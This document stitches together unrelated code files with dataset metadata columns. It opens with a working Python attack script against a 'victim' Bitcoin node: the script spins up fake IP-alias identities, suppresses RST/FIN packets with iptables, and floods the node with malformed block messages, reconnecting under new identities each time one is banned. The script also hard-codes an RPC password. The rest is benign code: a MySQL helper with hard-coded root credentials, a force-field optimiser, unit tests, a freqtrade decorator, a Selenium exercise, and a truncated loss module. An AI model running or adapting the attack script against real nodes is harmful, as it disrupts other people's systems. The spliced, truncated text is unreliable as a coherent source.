# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
    # By forcing the IP to be above a certain threshold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
    # Note: setsockopt() returns None and raises OSError on failure (it never
    # returns -1), so retry on the exception rather than on the return value
    while True:
        try:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
            break
        except OSError:
            print(f'Retrying: setting socket network interface to "{network_interface}"...')
            time.sleep(1)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
    # Receive the victim's version (and possibly verack) packet
    # (the original buffer size of 1924 looked like a typo for 1024)
    verack = s.recv(1024)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
    if verbose: print(f'Attaching attacker script to interface {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
        print(f'Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
    try:
        # The RPC call is commented out; network_info stays None, the lookups
        # below raise, and the hard-coded defaults above are kept.
        network_info = None  # json.loads(bitcoin('getnetworkinfo'))
        if network_info and 'subversion' in network_info:
            bitcoin_subversion = network_info['subversion']
        if network_info and 'protocolversion' in network_info:
            bitcoin_protocolversion = network_info['protocolversion']
    except Exception:
        pass
# Save a backup of the iptables rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptables rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is run when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006
| 359
| 0.743881
| 1,684
| 11,522
| 4.9519
| 0.226247
| 0.04461
| 0.064756
| 0.083463
| 0.222449
| 0.153016
| 0.144142
| 0.131071
| 0.093896
| 0.093896
| 0
| 0.03019
| 0.137563
| 11,522
| 333
| 360
| 34.600601
| 0.808997
| 0.24553
| 0
| 0.118421
| 0
| 0.026316
| 0.278183
| 0.051906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065789
| false
| 0.013158
| 0.078947
| 0.008772
| 0.175439
| 0.122807
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
| 1,638
|
py
|
Python
|
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
#!python3
'''
Database access helper class
author: justZero
email: alonezero@foxmail.com
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='root',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
    def close(self):
        # Close the cursor before the connection that owns it
        self.cursor.close()
        self.conn.close()
    # Batch insert
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
    # Insert movie records
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
    # Insert rating statistics
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
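# --- Editor's note: insert_rate() is defined above but not exercised here.
# Based on its SQL, a hypothetical call would pass (name, category, rate)
# tuples, e.g.:
#     db.insert_rate([('Drama', 'genre', 9.1), ('Comedy', 'genre', 8.4)])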
| 25.2
| 156
| 0.566545
| 192
| 1,638
| 4.677083
| 0.489583
| 0.035635
| 0.046771
| 0.053452
| 0.122494
| 0.071269
| 0.071269
| 0.071269
| 0.016704
| 0.016704
| 0
| 0.010563
| 0.306471
| 1,638
| 64
| 157
| 25.59375
| 0.77993
| 0.058608
| 0
| 0.04878
| 0
| 0.04878
| 0.203135
| 0.148269
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0.02439
| 0.146341
| 0
| 0.292683
| 0.02439
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5d1777ffd1452788619a58c2a3c09a88985225
| 2,077
|
py
|
Python
|
examples/rxff-serial/run.py
|
sctiwari/EZFF_ASE
|
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
|
[
"MIT"
] | 3
|
2019-01-22T21:22:09.000Z
|
2019-04-02T22:50:40.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 14
|
2019-01-14T18:33:15.000Z
|
2019-07-08T22:10:11.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 3
|
2019-03-24T23:43:13.000Z
|
2021-09-12T13:45:08.000Z
|
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
except:
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 37.763636
| 124
| 0.735676
| 306
| 2,077
| 4.70915
| 0.277778
| 0.030534
| 0.04372
| 0.029146
| 0.431645
| 0.353921
| 0.224844
| 0.224844
| 0.224844
| 0.163775
| 0
| 0.003452
| 0.163216
| 2,077
| 54
| 125
| 38.462963
| 0.825662
| 0.158883
| 0
| 0
| 0
| 0
| 0.121544
| 0.06106
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5db4db71b2cfe512dcdca6c87e641cb929544e
| 2,288
|
py
|
Python
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | 1
|
2022-01-29T17:14:40.000Z
|
2022-01-29T17:14:40.000Z
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 27.566265
| 89
| 0.542832
| 270
| 2,288
| 4.425926
| 0.259259
| 0.085356
| 0.097908
| 0.090377
| 0.366527
| 0.210879
| 0.210879
| 0.105439
| 0.037657
| 0.037657
| 0
| 0.106553
| 0.179633
| 2,288
| 82
| 90
| 27.902439
| 0.530101
| 0.111014
| 0
| 0.037037
| 0
| 0
| 0.167244
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5f21108bc3014442b8b88f1279054fc89706f5
| 5,302
|
py
|
Python
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1
|
2022-03-06T22:44:30.000Z
|
2022-03-06T22:44:30.000Z
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | null | null | null |
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1
|
2021-09-22T23:28:21.000Z
|
2021-09-22T23:28:21.000Z
|
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
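# --- Usage sketch (editor's addition, commented out: it needs a full freqtrade
# strategy class plus ta-lib at runtime). With the decorator above, the 1h
# BTC/<stake> dataframe is merged in with '{base}_{quote}_{column}_{timeframe}'
# column names, as documented in informative():
#
#     class MyStrategy(IStrategy):
#         timeframe = '5m'
#
#         @informative('1h', 'BTC/{stake}')
#         def populate_indicators_btc_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
#             dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
#             return dataframe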
| 41.100775
| 100
| 0.656733
| 597
| 5,302
| 5.708543
| 0.273032
| 0.024648
| 0.017606
| 0.01115
| 0.090376
| 0.037559
| 0.02054
| 0.02054
| 0
| 0
| 0
| 0.001009
| 0.252546
| 5,302
| 128
| 101
| 41.421875
| 0.858945
| 0.375707
| 0
| 0.042254
| 0
| 0
| 0.078898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056338
| false
| 0
| 0.056338
| 0.014085
| 0.239437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c60db4ddf2f272ea38921358d511b5e55303545
| 835
|
py
|
Python
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 234
|
2020-04-03T02:59:30.000Z
|
2022-03-27T15:29:21.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 8
|
2020-04-20T11:20:43.000Z
|
2021-08-18T16:41:15.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 77
|
2020-04-03T13:25:19.000Z
|
2022-02-24T15:31:26.000Z
|
from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
    print(f'Trying to find "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Something went wrong')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
    'The success message did not appear'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'  # the page's own text (Portuguese for "Loading finished")
| 21.973684
| 58
| 0.762874
| 105
| 835
| 5.866667
| 0.52381
| 0.073052
| 0.063312
| 0.061688
| 0.097403
| 0.097403
| 0
| 0
| 0
| 0
| 0
| 0.005525
| 0.132934
| 835
| 37
| 59
| 22.567568
| 0.845304
| 0
| 0
| 0
| 0
| 0
| 0.205988
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.041667
| false
| 0
| 0.125
| 0
| 0.25
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
| 1,470
|
py
|
Python
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 24
|
2020-06-30T11:43:38.000Z
|
2021-11-15T22:58:47.000Z
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | null | null | null |
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 4
|
2020-10-15T10:54:18.000Z
|
2021-05-25T07:38:14.000Z
|
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
    """Combined transition / reward / negative-sampling loss."""
    def __init__(self, hinge, neg=True, rew=True):
        """
        :param hinge: hinge margin (eps) for the negative-sample distance
        :param neg: if False, skip negative sampling
        :param rew: if False, skip the reward loss
        """
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
    def forward(self, z_c, z_l, z_n, z_f, r, r_e):
        """Return (transition_loss, reward_loss, negative_loss) for a batch of
        state embeddings (z_*) and true/estimated rewards (r, r_e)."""
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
